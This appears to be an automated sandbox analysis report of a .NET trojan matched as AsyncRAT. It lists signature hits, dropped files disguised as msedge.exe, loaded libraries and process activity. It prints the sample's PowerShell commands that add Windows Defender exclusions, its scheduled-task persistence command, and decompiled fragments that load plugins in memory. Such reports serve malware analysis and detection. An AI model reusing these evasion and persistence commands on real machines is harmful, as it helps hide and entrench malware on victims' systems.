Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Code function: 23_2_00007FFAAC620EFA	23_2_00007FFAAC620EFA
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Code function: 26_2_00007FFAAC600EFA	26_2_00007FFAAC600EFA
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Code function: 26_2_00007FFAAC600F68	26_2_00007FFAAC600F68

Source: file.exe, 00000005.00000002.1564147086.0000000012781000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsedge.exe4 vs file.exe
Source: file.exe, 00000005.00000000.1275494470.0000000000282000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamemsedge.exe4 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamemsedge.exe4 vs file.exe

Source: 18.2.msedge.exe.1520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 18.2.msedge.exe.1520000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 18.2.msedge.exe.309c4c0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000012.00000002.2551372869.0000000001520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000012.00000002.2552140840.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: file.exe, D2C21D2D2D.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.5.dr, D2C21D2D2D.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.file.exe.12781a78.0.raw.unpack, D2C21D2D2D.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Runtime Broken Core.exe.18.dr, D2C21D2D2D.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 18.2.msedge.exe.1520000.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 18.2.msedge.exe.1520000.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 18.2.msedge.exe.1520000.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: file.exe, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: file.exe, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: file.exe, Task.cs	Task registration methods: 'RegisterChanges'
Source: msedge.exe.5.dr, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: msedge.exe.5.dr, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 18.2.msedge.exe.1520000.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 18.2.msedge.exe.1520000.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.file.exe.12781a78.0.raw.unpack, D2C21D2D2D.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.2.file.exe.12781a78.0.raw.unpack, D2C21D2D2D.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Runtime Broken Core.exe.18.dr, TaskFolder.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Runtime Broken Core.exe.18.dr, D2C21D2D2D.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Runtime Broken Core.exe.18.dr, D2C21D2D2D.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: msedge.exe.5.dr, TaskFolder.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.file.exe.12781a78.0.raw.unpack, TaskFolder.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: msedge.exe.5.dr, D2C21D2D2D.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: msedge.exe.5.dr, D2C21D2D2D.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: file.exe, D2C21D2D2D.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: file.exe, D2C21D2D2D.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: file.exe, TaskFolder.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@16/14@2/2

Source: C:\Users\user\Desktop\file.exe

File created: C:\Program Files\msedge.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Users\user\Desktop\file.exe	Mutant created: \Sessions\1\BaseNamedObjects\B2AnmGQZEpZMj5gek
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jgdhokbz.iez.ps1

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 81%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\msedge.exe "C:\Program Files\msedge.exe"
Source: unknown	Process created: C:\Program Files\msedge.exe "C:\Program Files\msedge.exe"
Source: C:\Program Files\msedge.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broken Core" /tr "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe'	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'	Jump to behavior
Source: C:\Program Files\msedge.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broken Core" /tr "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Directory created: C:\Program Files\msedge.exe

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 18.2.msedge.exe.309c4c0.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 18.2.msedge.exe.1520000.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 18.2.msedge.exe.1520000.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: file.exe, Trigger.cs	.Net Code: GetBestTimeSpanString
Source: file.exe, Task.cs	.Net Code: ShowEditor
Source: msedge.exe.5.dr, Trigger.cs	.Net Code: GetBestTimeSpanString
Source: msedge.exe.5.dr, Task.cs	.Net Code: ShowEditor
Source: 5.2.file.exe.12781a78.0.raw.unpack, Trigger.cs	.Net Code: GetBestTimeSpanString
Source: 5.2.file.exe.12781a78.0.raw.unpack, Task.cs	.Net Code: ShowEditor
Source: Runtime Broken Core.exe.18.dr, Trigger.cs	.Net Code: GetBestTimeSpanString
Source: Runtime Broken Core.exe.18.dr, Task.cs	.Net Code: ShowEditor
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 18.2.msedge.exe.1520000.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 18.2.msedge.exe.1520000.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 18.2.msedge.exe.1520000.0.raw.unpack, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\file.exe	Code function: 5_2_00007FFAAC6300BD pushad ; iretd	5_2_00007FFAAC6300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFAAC4FD2A5 pushad ; iretd	10_2_00007FFAAC4FD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFAAC6100BD pushad ; iretd	10_2_00007FFAAC6100C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFAAC611044 push E859FD0Dh; ret	10_2_00007FFAAC6110F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFAAC6E2316 push 8B485F93h; iretd	10_2_00007FFAAC6E231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAAC4FD2A5 pushad ; iretd	14_2_00007FFAAC4FD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAAC6100BD pushad ; iretd	14_2_00007FFAAC6100C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAAC6E2316 push 8B485F93h; iretd	14_2_00007FFAAC6E231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFAAC6E259A pushad ; retf	14_2_00007FFAAC6E25C1
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Code function: 22_2_00007FFAAC6300BD pushad ; iretd	22_2_00007FFAAC6300C1

Source: C:\Users\user\Desktop\file.exe	File created: C:\Program Files\msedge.exe			Jump to dropped file
Source: C:\Program Files\msedge.exe	File created: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

